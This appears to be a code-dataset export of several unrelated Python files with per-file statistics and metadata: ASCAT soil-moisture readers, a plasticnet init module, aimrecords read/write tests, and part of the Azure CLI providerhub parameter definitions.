# documentation and/or other materials provided with the distribution.
# * Neither the name of TU Wien, Department of Geodesy and Geoinformation
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL TU WIEN DEPARTMENT OF GEODESY AND
# GEOINFORMATION BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Readers for data downloaded from EUMETSAT data centre (UMARF)
"""
from ascat.read_native.bufr import AscatL2SsmBufr
from ascat.read_native.bufr import AscatL2SsmBufrChunked
from ascat.read_native.nc import AscatL2SsmNc
class AscatL2Ssm125(AscatL2SsmBufr):
"""
ASCAT A Level2 Soil Moisture at 12.5 km Swath Grid BUFR files from EUMETSAT
Parameters
----------
path: string
path where the data is stored
month_path_str: string, optional
If the data is stored in subpaths per year or month then specify the string
that should be used in datetime.datetime.strftime to get the subpath for a file.
Default: ''
"""
def __init__(self, path, month_path_str=''):
day_search_str = 'M0?-ASCA-ASCSMR02-NA-5.0-%Y%m%d*.bfr'
file_search_str = 'M0?-ASCA-ASCSMR02-NA-5.0-{datetime}*.bfr'
datetime_format = '%Y%m%d%H%M%S'
filename_datetime_format = (25, 39, '%Y%m%d%H%M%S')
super(AscatL2Ssm125, self).__init__(path, month_path_str=month_path_str,
day_search_str=day_search_str,
file_search_str=file_search_str,
datetime_format=datetime_format,
filename_datetime_format=filename_datetime_format)
class AscatL2Ssm125PDU(AscatL2SsmBufr):
"""
ASCAT A Level2 Soil Moisture at 12.5 km Swath Grid PDU BUFR files from EUMETSAT
Parameters
----------
path: string
path where the data is stored
month_path_str: string, optional
If the data is stored in subpaths per year or month then specify the string
that should be used in datetime.datetime.strftime to get the subpath for a file.
Default: ''
"""
def __init__(self, path, month_path_str=''):
day_search_str = 'W_XX-EUMETSAT-Darmstadt,SOUNDING+SATELLITE,METOP?+ASCAT_C_EUM?_%Y%m%d*_125_ssm_l2.bin'
file_search_str = 'W_XX-EUMETSAT-Darmstadt,SOUNDING+SATELLITE,METOP?+ASCAT_C_EUM?_{datetime}*_125_ssm_l2.bin'
datetime_format = '%Y%m%d%H%M%S'
filename_datetime_format = (63, 77, '%Y%m%d%H%M%S')
super(AscatL2Ssm125PDU, self).__init__(path, month_path_str=month_path_str,
day_search_str=day_search_str,
file_search_str=file_search_str,
datetime_format=datetime_format,
filename_datetime_format=filename_datetime_format)
class AscatL2Ssm125PDUChunked(AscatL2SsmBufrChunked):
"""
ASCAT A Level2 Soil Moisture at 12.5 km Swath Grid PDU BUFR files from EUMETSAT
in 50 minute chunks.
Parameters
----------
path: string
path where the data is stored
month_path_str: string, optional
If the data is stored in subpaths per year or month then specify the string
that should be used in datetime.datetime.strftime to get the subpath for a file.
Default: ''
chunk_minutes: int, optional
How many minutes should a chunk of data cover.
"""
def __init__(self, path, month_path_str='', chunk_minutes=100):
day_search_str = 'W_XX-EUMETSAT-Darmstadt,SOUNDING+SATELLITE,METOP?+ASCAT_C_EUM?_%Y%m%d*_125_ssm_l2.bin'
file_search_str = 'W_XX-EUMETSAT-Darmstadt,SOUNDING+SATELLITE,METOP?+ASCAT_C_EUM?_{datetime}*_125_ssm_l2.bin'
datetime_format = '%Y%m%d%H%M%S'
filename_datetime_format = (63, 77, '%Y%m%d%H%M%S')
super(AscatL2Ssm125PDUChunked, self).__init__(path, month_path_str=month_path_str,
day_search_str=day_search_str,
file_search_str=file_search_str,
datetime_format=datetime_format,
filename_datetime_format=filename_datetime_format,
chunk_minutes=chunk_minutes)
class AscatL2Ssm250(AscatL2SsmBufr):
"""
ASCAT A Level2 Soil Moisture at 25.0 km Swath Grid BUFR files from EUMETSAT
Parameters
----------
path: string
path where the data is stored
month_path_str: string, optional
If the data is stored in subpaths per year or month then specify the string
that should be used in datetime.datetime.strftime to get the subpath for a file.
Default: ''
"""
def __init__(self, path, month_path_str=''):
day_search_str = 'M0?-ASCA-ASCSMO02-NA-5.0-%Y%m%d*.bfr'
file_search_str = 'M0?-ASCA-ASCSMO02-NA-5.0-{datetime}*.bfr'
datetime_format = '%Y%m%d%H%M%S'
filename_datetime_format = (25, 39, '%Y%m%d%H%M%S')
super(AscatL2Ssm250, self).__init__(path, month_path_str=month_path_str,
day_search_str=day_search_str,
file_search_str=file_search_str,
datetime_format=datetime_format,
filename_datetime_format=filename_datetime_format)
class AscatL2Ssm250PDU(AscatL2SsmBufr):
"""
ASCAT A Level2 Soil Moisture at 25 km Swath Grid PDU BUFR files from EUMETSAT
Parameters
----------
path: string
path where the data is stored
month_path_str: string, optional
If the data is stored in subpaths per year or month then specify the string
that should be used in datetime.datetime.strftime to get the subpath for a file.
Default: ''
"""
def __init__(self, path, month_path_str=''):
day_search_str = 'W_XX-EUMETSAT-Darmstadt,SOUNDING+SATELLITE,METOP?+ASCAT_C_EUM?_%Y%m%d*_250_ssm_l2.bin'
file_search_str = 'W_XX-EUMETSAT-Darmstadt,SOUNDING+SATELLITE,METOP?+ASCAT_C_EUM?_{datetime}*_250_ssm_l2.bin'
datetime_format = '%Y%m%d%H%M%S'
filename_datetime_format = (63, 77, '%Y%m%d%H%M%S')
super(AscatL2Ssm250PDU, self).__init__(path, month_path_str=month_path_str,
day_search_str=day_search_str,
file_search_str=file_search_str,
datetime_format=datetime_format,
filename_datetime_format=filename_datetime_format)
class AscatL2Ssm250PDUChunked(AscatL2SsmBufrChunked):
"""
ASCAT A Level2 Soil Moisture at 25 km Swath Grid PDU BUFR files from EUMETSAT
Parameters
----------
path: string
path where the data is stored
month_path_str: string, optional
If the data is stored in subpaths per year or month then specify the string
that should be used in datetime.datetime.strftime to get the subpath for a file.
Default: ''
chunk_minutes: int, optional
How many minutes should a chunk of data cover.
"""
def __init__(self, path, month_path_str='', chunk_minutes=100):
day_search_str = 'W_XX-EUMETSAT-Darmstadt,SOUNDING+SATELLITE,METOP?+ASCAT_C_EUM?_%Y%m%d*_250_ssm_l2.bin'
file_search_str = 'W_XX-EUMETSAT-Darmstadt,SOUNDING+SATELLITE,METOP?+ASCAT_C_EUM?_{datetime}*_250_ssm_l2.bin'
datetime_format = '%Y%m%d%H%M%S'
filename_datetime_format = (63, 77, '%Y%m%d%H%M%S')
super(AscatL2Ssm250PDUChunked, self).__init__(path, month_path_str=month_path_str,
day_search_str=day_search_str,
file_search_str=file_search_str,
datetime_format=datetime_format,
filename_datetime_format=filename_datetime_format,
chunk_minutes=chunk_minutes)
class AscatL2Ssm125Nc(AscatL2SsmNc):
"""
ASCAT A Level2 Soil Moisture at 12.5 km Swath Grid NetCDF files from EUMETSAT
Parameters
----------
path: string
path where the data is stored
month_path_str: string, optional
If the data is stored in subpaths per year or month then specify the string
that should be used in datetime.datetime.strftime to get the subpath for a file.
Default: ''
"""
def __init__(self, path, month_path_str=''):
day_search_str = 'W_XX-EUMETSAT-Darmstadt,SURFACE+SATELLITE,METOP?+ASCAT_C_EUM?_%Y%m%d*_125_ssm_l2.nc'
file_search_str = 'W_XX-EUMETSAT-Darmstadt,SURFACE+SATELLITE,METOP?+ASCAT_C_EUM?_{datetime}*_125_ssm_l2.nc'
datetime_format = '%Y%m%d%H%M%S'
filename_datetime_format = (62, 76, '%Y%m%d%H%M%S')
super(AscatL2Ssm125Nc, self).__init__(path, month_path_str=month_path_str,
day_search_str=day_search_str,
file_search_str=file_search_str,
datetime_format=datetime_format,
filename_datetime_format=filename_datetime_format)
class AscatL2Ssm250Nc(AscatL2SsmNc):
"""
ASCAT A Level2 Soil Moisture at 25 km Swath Grid NetCDF files from EUMETSAT
Parameters
----------
path: string
path where the data is stored
month_path_str: string, optional
If the data is stored in subpaths per year or month then specify the string
that should be used in datetime.datetime.strftime to get the subpath for a file.
Default: ''
"""
def __init__(self, path, month_path_str=''):
day_search_str = 'W_XX-EUMETSAT-Darmstadt,SURFACE+SATELLITE,METOP?+ASCAT_C_EUM?_%Y%m%d*_250_ssm_l2.nc'
file_search_str = 'W_XX-EUMETSAT-Darmstadt,SURFACE+SATELLITE,METOP?+ASCAT_C_EUM?_{datetime}*_250_ssm_l2.nc'
datetime_format = '%Y%m%d%H%M%S'
filename_datetime_format = (62, 76, '%Y%m%d%H%M%S')
super(AscatL2Ssm250Nc, self).__init__(path, month_path_str=month_path_str,
day_search_str=day_search_str,
file_search_str=file_search_str,
datetime_format=datetime_format,
filename_datetime_format=filename_datetime_format)
| 48.704 | 117 | 0.629189 | 1,560 | 12,176 | 4.660256 | 0.146795 | 0.059422 | 0.05282 | 0.045392 | 0.810316 | 0.803714 | 0.795736 | 0.769326 | 0.757221 | 0.756396 | 0 | 0.025119 | 0.293775 | 12,176 | 249 | 118 | 48.899598 | 0.820328 | 0.388387 | 0 | 0.709677 | 0 | 0.129032 | 0.196581 | 0.169231 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086022 | false | 0 | 0.032258 | 0 | 0.204301 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a1bfcc08304d889e23e2b299ac51c819baa4e8b7 | 461 | py | Python | plasticnet/solvers/functional/__init__.py | donovanr/plastic_net | 28801059133e3f73359c5787ad235eac6c7e77ee | [
"MIT"
] | 1 | 2018-07-29T00:09:48.000Z | 2018-07-29T00:09:48.000Z | plasticnet/solvers/functional/__init__.py | donovanr/plasticnet | 28801059133e3f73359c5787ad235eac6c7e77ee | [
"MIT"
] | 28 | 2018-07-11T21:35:05.000Z | 2018-07-26T18:10:45.000Z | plasticnet/solvers/functional/__init__.py | donovanr/plastic_net | 28801059133e3f73359c5787ad235eac6c7e77ee | [
"MIT"
] | 2 | 2018-10-16T17:21:25.000Z | 2019-12-23T06:45:55.000Z | from .functional import (
ordinary_least_squares,
ridge,
lasso,
elastic_net,
general_plastic_net,
plastic_ridge,
plastic_lasso,
hard_plastic_net,
soft_plastic_net,
unified_plastic_net,
)
__all__ = [
"ordinary_least_squares",
"ridge",
"lasso",
"elastic_net",
"general_plastic_net",
"plastic_ridge",
"plastic_lasso",
"hard_plastic_net",
"soft_plastic_net",
"unified_plastic_net",
]
| 17.730769 | 29 | 0.661605 | 50 | 461 | 5.5 | 0.32 | 0.290909 | 0.145455 | 0.181818 | 0.916364 | 0.916364 | 0.916364 | 0.916364 | 0.916364 | 0.916364 | 0 | 0 | 0.238612 | 461 | 25 | 30 | 18.44 | 0.783476 | 0 | 0 | 0 | 0 | 0 | 0.301518 | 0.047722 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041667 | 0 | 0.041667 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
62a9990b273f0363ddddc7994f1ef33a69139df5 | 2,766 | py | Python | tests/record_storage/test_read_write.py | aimhubio/aimrecords | ed0ca6d0ea2e5b498b9cd8f4e9c3f704cd4f9073 | [
"Apache-2.0"
] | 10 | 2020-05-19T22:24:54.000Z | 2021-02-25T01:52:08.000Z | tests/record_storage/test_read_write.py | aimhubio/aimrecords | ed0ca6d0ea2e5b498b9cd8f4e9c3f704cd4f9073 | [
"Apache-2.0"
] | 5 | 2020-07-11T16:01:22.000Z | 2021-01-21T11:45:01.000Z | tests/record_storage/test_read_write.py | aimhubio/aimrecords | ed0ca6d0ea2e5b498b9cd8f4e9c3f704cd4f9073 | [
"Apache-2.0"
] | 5 | 2020-05-20T00:49:58.000Z | 2021-01-20T12:59:18.000Z | import os
import tempfile
import unittest
from aimrecords.record_storage.reader import Reader
from aimrecords.record_storage.writer import Writer
class TestReadWrite(unittest.TestCase):
def test_dirty_read(self):
with tempfile.TemporaryDirectory() as temp_dir:
path = os.path.join(temp_dir, 'loss')
writer = Writer(path, compression='gzip')
length = 1000
for index in range(length):
writer.append_record(str(index).encode())
writer.flush()
reader = Reader(path, uncommitted_bucket_visible=True)
assert reader.get_records_num() == index + 1
assert index == int(reader.get(index).decode())
reader.close()
writer.close()
def test_read_write_on_existing_data(self):
with tempfile.TemporaryDirectory() as temp_dir:
path = os.path.join(temp_dir, 'loss')
writer = Writer(path, compression='gzip')
length = 1000
for index in range(length):
writer.append_record(str(index).encode())
writer.close()
writer = Writer(path, rewrite=False, compression='gzip')
for index in range(length, 2 * length):
writer.append_record(str(index).encode())
writer.flush()
reader = Reader(path, uncommitted_bucket_visible=True)
assert reader.get_records_num() == index + 1
assert index == int(reader.get(index).decode())
reader.close()
writer.close()
def test_uncommitted_read_on_closed(self):
with tempfile.TemporaryDirectory() as temp_dir:
path = os.path.join(temp_dir, 'loss')
writer = Writer(path, compression='gzip')
length = 1000
for index in range(length):
writer.append_record(str(index).encode())
writer.close()
reader = Reader(path, uncommitted_bucket_visible=True)
assert reader.get_records_num() == length
for index in range(length):
assert index == int(reader.get(index).decode())
reader.close()
def test_read_write(self):
with tempfile.TemporaryDirectory() as temp_dir:
path = os.path.join(temp_dir, 'loss')
writer = Writer(path, compression=None)
length = 1000
for index in range(length):
writer.append_record(str(index).encode())
writer.flush()
reader = Reader(path, uncommitted_bucket_visible=False)
assert reader.get_records_num() == 0
reader.close()
writer.close()
| 33.731707 | 71 | 0.57773 | 297 | 2,766 | 5.232323 | 0.20202 | 0.036036 | 0.03861 | 0.057915 | 0.810167 | 0.750965 | 0.750965 | 0.750965 | 0.750965 | 0.722008 | 0 | 0.010678 | 0.322849 | 2,766 | 81 | 72 | 34.148148 | 0.819007 | 0 | 0 | 0.737705 | 0 | 0 | 0.011569 | 0 | 0 | 0 | 0 | 0 | 0.114754 | 1 | 0.065574 | false | 0 | 0.081967 | 0 | 0.163934 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
62c14001030056a6d58d1136a20c6db37e0874c6 | 33,001 | py | Python | src/providerhub/azext_providerhub/generated/_params.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 2 | 2021-06-05T17:51:26.000Z | 2021-11-17T11:17:56.000Z | src/providerhub/azext_providerhub/generated/_params.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 3 | 2020-05-27T20:16:26.000Z | 2020-07-23T19:46:49.000Z | src/providerhub/azext_providerhub/generated/_params.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 5 | 2020-09-08T22:46:48.000Z | 2020-11-08T14:54:35.000Z | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
# pylint: disable=line-too-long
from azure.cli.core.commands.parameters import (
get_three_state_flag,
get_enum_type,
resource_group_name_type
)
from azure.cli.core.commands.validators import validate_file_or_dict
from azext_providerhub.action import (
AddCanary,
AddProviderAuthentication,
AddProviderAuthorizations,
AddResourceProviderAuthentication,
AddCapabilities,
AddSkipRegions,
AddTemplateDeploymentOptions,
AddServiceTreeInfos,
AddResourceTypeEndpointProperties,
AddProviderHubMetadataProviderAuthorizations,
AddAuthorizations,
AddSwaggerSpecifications,
AddAuthorizationActionMappings,
AddLinkedAccessChecks,
AddThrottlingRules,
AddIdentityManagement,
AddCheckNameAvailabilitySpecifications,
AddResourcetyperegistrationServiceTreeInfos,
AddSubscriptionStateRules,
AddExtendedLocations,
AddResourceMovePolicy,
AddRequiredFeatures,
AddResourceCreationBegin,
AddResourcePatchBegin,
AddLoggingRules,
)
def load_arguments(self, _):
with self.argument_context('providerhub custom-rollout list') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
with self.argument_context('providerhub custom-rollout show') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('rollout_name', type=str,
help='The rollout name.', id_part='child_name_1')
with self.argument_context('providerhub custom-rollout create') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
c.argument('rollout_name', type=str, help='The rollout name.')
c.argument('canary', action=AddCanary, nargs='+',
help='The canary regions to apply the manifest.')
with self.argument_context('providerhub custom-rollout update') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('rollout_name', type=str,
help='The rollout name.', id_part='child_name_1')
c.argument('canary', action=AddCanary, nargs='+',
help='The canary regions to apply the manifest.')
with self.argument_context('providerhub default-rollout list') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
with self.argument_context('providerhub default-rollout show') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('rollout_name', type=str,
help='The rollout name.', id_part='child_name_1')
with self.argument_context('providerhub default-rollout create') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
c.argument('rollout_name', type=str, help='The rollout name.')
c.argument('row2_wait_duration', type=str, help='The wait duration before the rollout '
'begins in rest of the world two.')
c.argument('skip_regions', action=AddSkipRegions,
nargs='*', help='The canary regions to skip.')
with self.argument_context('providerhub default-rollout update') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
c.argument('rollout_name', type=str, help='The rollout name.')
c.argument('row2_wait_duration', type=str, help='The wait duration before the rollout begins '
'in rest of the world two.')
c.argument('skip_regions', action=AddSkipRegions,
nargs='*', help='The canary regions to skip.')
with self.argument_context('providerhub default-rollout delete') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('rollout_name', type=str,
help='The rollout name.', id_part='child_name_1')
with self.argument_context('providerhub default-rollout stop') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('rollout_name', type=str,
help='The rollout name.', id_part='child_name_1')
with self.argument_context('providerhub default-rollout wait') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('rollout_name', type=str,
help='The rollout name.', id_part='child_name_1')
with self.argument_context('providerhub manifest checkin') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('environment', type=str, help='The environment supplied to the checkin manifest '
'operation.')
c.argument('arm_manifest_location', type=str, help='The baseline ARM manifest location supplied to '
'the checkin manifest operation.')
with self.argument_context('providerhub manifest generate') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
with self.argument_context('providerhub provider-registration list') as c:
c.argument('resource_group_name', resource_group_name_type)
with self.argument_context('providerhub provider-registration show') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
with self.argument_context('providerhub provider-registration create') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
c.argument('provider_authentication', action=AddProviderAuthentication, nargs='+',
help='Used to set alternative "audiences or resources" that ARM should accept from the token while authenticating requests for the provider. Only available to tenant level providers.')
c.argument('provider_authorizations', action=AddProviderAuthorizations,
nargs='+', help='The resource provider authorizations.')
c.argument('provider_version', type=str,
help='The provider version. 2.0 is the only supported version.')
c.argument('provider_type', arg_type=get_enum_type(['NotSpecified', 'Internal', 'External', 'Hidden',
'RegistrationFree', 'LegacyRegistrationRequired',
'TenantOnly', 'AuthorizationFree']), help='Value can be "Internal", "External", "Hidden", "RegistrationFree", "TenantOnly" or "LegacyRegistrationRequired". RegistrationFree is for providers that do not need subscriptions to explicitly register to use the provider. Hidden flag ensures that discovery APIs (GET /Providers) will not show the provider, however a user can still write to the provider explicitly. TenantOnly will not appear in Get /Providers and will not allow registration from users. LegacyRegistrationRequired is for legacy providers that need RDFE registration in addition to ARM registration.')
c.argument('capabilities', action=AddCapabilities, nargs='+', help='Allow the access to the resource provider from a restrictive subscription quota (DreamSpark_2015-02-01 and CSP_2015-05-01). The requiredFeatures array is optional, if specified the subscription should meet the quota and at least one of the features. If no capabilities is specified the provider will be available to every subscription but the restrictive quotas. New providers are required to allow CSP_2015-05-01')
c.argument('metadata', type=validate_file_or_dict,
help='The metadata.')
c.argument('template_deployment_options', action=AddTemplateDeploymentOptions,
nargs='+', help='The field for preflight options.')
c.argument('schema_owners', nargs='+',
help='Specifies an array of needed ACIS claims to modify the resource provider schema via ACIS.', arg_group='Management')
c.argument('manifest_owners', nargs='+',
help='Specifies an array of required ACIS claims to modify the resource provider\'s manifest content via ACIS.', arg_group='Management')
c.argument('incident_routing_service', type=str,
help='The Service in IcM when creating or transferring incidents to the RP.', arg_group='Management')
c.argument('incident_routing_team', type=str,
help='The Team in IcM when creating or transferring incidents to the RP.', arg_group='Management')
c.argument('incident_contact_email', type=str,
help='The email address of contacts for incidents related to the RP.', arg_group='Management')
c.argument('service_tree_infos', action=AddServiceTreeInfos, nargs='+', help='The ServiceTree information for the resource provider.',
arg_group='Management')
c.argument('resource_access_policy', arg_type=get_enum_type(['NotSpecified', 'AcisReadAllowed',
'AcisActionAllowed']), help='The resource access policy.',
arg_group='Management')
c.argument('opt_in_headers', arg_type=get_enum_type(['NotSpecified', 'SignedUserToken',
'ClientGroupMembership', 'SignedAuxiliaryTokens',
'UnboundedClientGroupMembership']), help='ARM allows customized headers when sending requests to the RP. This can be done both at the provider level or at the individual resource type level.',
arg_group='Request Header Options')
c.argument('required_features_policy', arg_type=get_enum_type(['Any', 'All']), help='The accepted values are "Any" or "All". If the value is "All", then only the subscriptions registered to all the corresponding feature flag will be allowed.', arg_group='Features '
'Rule')
c.argument('providerhub_metadata_provider_authorizations',
action=AddProviderHubMetadataProviderAuthorizations, nargs='+', help='Available only for first party providers, this section can be used to bootstrap Service-to-Service authentication and authorization for the provider\'s application. When set, it would allow provider to access users\' subscription registered with them.', arg_group='Provider Hub Metadata')
c.argument('providerhub_metadata_rp_authentication', action=AddResourceProviderAuthentication, nargs='+', help='Used to set alternative "audiences or resources" that ARM should accept from the token while authenticating requests for the provider. Only available to tenant level providers.',
arg_group='Provider Hub Metadata')
c.argument('lighthouse_authorizations', action=AddAuthorizations, nargs='+', help='The lighthouse authorizations.', arg_group='Provider Hub Metadata '
'Third Party Provider Authorization')
c.argument('managed_by_tenant_id', type=str, help='The managed by tenant ID.', arg_group='Provider Hub Metadata Third Party Provider '
'Authorization')
with self.argument_context('providerhub provider-registration update') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('provider_authentication', action=AddProviderAuthentication, nargs='+',
help='Used to set alternative "audiences or resources" that ARM should accept from the token while authenticating requests for the provider. Only available to tenant level providers.')
c.argument('provider_authorizations', action=AddProviderAuthorizations,
nargs='+', help='The resource provider authorizations.')
c.argument('namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
c.argument('provider_version', type=str,
help='The provider version. 2.0 is the only supported version.')
c.argument('provider_type', arg_type=get_enum_type(['NotSpecified', 'Internal', 'External', 'Hidden',
'RegistrationFree', 'LegacyRegistrationRequired',
'TenantOnly', 'AuthorizationFree']), help='Value can be "Internal", "External", "Hidden", "RegistrationFree", "TenantOnly" or "LegacyRegistrationRequired". RegistrationFree is for providers that do not need subscriptions to explicitly register to use the provider. Hidden flag ensures that discovery APIs (GET /Providers) will not show the provider, however a user can still write to the provider explicitly. TenantOnly will not appear in Get /Providers and will not allow registration from users. LegacyRegistrationRequired is for legacy providers that need RDFE registration in addition to ARM registration.')
c.argument('required_features', action=AddRequiredFeatures, nargs='+',
help='If specified, only subscriptions registered to the corresponding feature flag will be allowed.')
c.argument('capabilities', action=AddCapabilities, nargs='+', help='Allow the access to the resource provider from a restrictive subscription quota (DreamSpark_2015-02-01 and CSP_2015-05-01). The requiredFeatures array is optional, if specified the subscription should meet the quota and at least one of the features. If no capabilities is specified the provider will be available to every subscription but the restrictive quotas. New providers are required to allow CSP_2015-05-01')
c.argument('metadata', type=validate_file_or_dict,
help='Any object Expected value: json-string/@json-file.')
c.argument('template_deployment_options', action=AddTemplateDeploymentOptions,
nargs='+', help='The field for preflight options.')
c.argument('schema_owners', nargs='+',
help='Specifies an array of needed ACIS claims to modify the resource provider schema via ACIS.', arg_group='Management')
c.argument('manifest_owners', nargs='+',
help='Specifies an array of required ACIS claims to modify the resource provider\'s manifest content via ACIS.', arg_group='Management')
c.argument('incident_routing_service', type=str,
help='The "Service" in IcM when creating or transferring incidents to the RP.', arg_group='Management')
c.argument('incident_routing_team', type=str,
help='The "Team" in IcM when creating or transferring incidents to the RP.', arg_group='Management')
c.argument('incident_contact_email', type=str,
help='The email address of contacts for incidents related to the RP.', arg_group='Management')
c.argument('service_tree_infos', action=AddServiceTreeInfos, nargs='+', help='The ServiceTree information for the resource provider.',
arg_group='Management')
c.argument('resource_access_policy', arg_type=get_enum_type(['NotSpecified', 'AcisReadAllowed',
'AcisActionAllowed']), help='The resource access policy.',
arg_group='Management')
c.argument('opt_in_headers', arg_type=get_enum_type(['NotSpecified', 'SignedUserToken',
'ClientGroupMembership', 'SignedAuxiliaryTokens',
'UnboundedClientGroupMembership']), help='ARM allows customized headers when sending requests to the RP. This can be done both at the provider level or at the individual resource type level.',
arg_group='Request Header Options')
c.argument('required_features_policy', arg_type=get_enum_type(['Any', 'All']), help='The accepted values are "Any" or "All". If the value is "All", then only the subscriptions registered to all the corresponding feature flag will be allowed.', arg_group='Features '
'Rule')
c.argument('providerhub_metadata_provider_authorizations',
action=AddProviderHubMetadataProviderAuthorizations, nargs='+', help='Available only for first party providers, this section can be used to bootstrap Service-to-Service authentication and authorization for the provider\'s application. When set, it would allow provider to access users\' subscription registered with them.', arg_group='Provider Hub '
'Metadata')
c.argument('providerhub_metadata_rp_authentication', action=AddResourceProviderAuthentication, nargs='+', help='Used to set alternative "audiences or resources" that ARM should accept from the token while authenticating requests for the provider. Only available to tenant level providers.',
arg_group='Provider Hub Metadata')
c.argument('lighthouse_authorizations', action=AddAuthorizations, nargs='+', help='The lighthouse authorizations.', arg_group='Provider Hub Metadata '
'Third Party Provider Authorization')
c.argument('managed_by_tenant_id', type=str, help='The managed by tenant ID.', arg_group='Provider Hub Metadata Third Party Provider '
'Authorization')
c.ignore('properties')
with self.argument_context('providerhub provider-registration delete') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
with self.argument_context('providerhub provider-registration generate-operation') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
with self.argument_context('providerhub provider-registration wait') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
with self.argument_context('providerhub resource-type-registration list') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
with self.argument_context('providerhub resource-type-registration show') as c:
c.argument('provider_namespace', type=str, help='The name of the resource provider hosted within ProviderHub.',
id_part='name')
c.argument('resource_type', type=str,
help='The resource type.', id_part='child_name_1')
with self.argument_context('providerhub resource-type-registration create') as c:
c.argument('provider_namespace', type=str,
help='The name of the resource provider hosted within ProviderHub.')
c.argument('resource_type', type=str, help='The resource type.')
c.argument('routing_type', arg_type=get_enum_type(['Default', 'ProxyOnly', 'HostBased', 'Extension',
'Tenant', 'Fanout', 'LocationBased', 'Failover',
'CascadeExtension']), help='The resource routing type.')
c.argument('regionality', arg_type=get_enum_type(
['NotSpecified', 'Global', 'Regional']), help='The regionality of the resource type.')
c.argument('endpoints', action=AddResourceTypeEndpointProperties, nargs='+', help='The resource '
'type endpoint properties.')
c.argument('resource_creation_begin', action=AddResourceCreationBegin, nargs='+',
help='Extension options for handling the resource creation begin extension request.')
c.argument('resource_patch_begin', action=AddResourcePatchBegin, nargs='+',
help='Extension options for handling the resource patch begin extension request.')
c.argument('marketplace_type', arg_type=get_enum_type(
['NotSpecified', 'AddOn', 'Bypass', 'Store']), help='The resource type behavior in the marketplace.')
c.argument('swagger_specifications', action=AddSwaggerSpecifications, nargs='+',
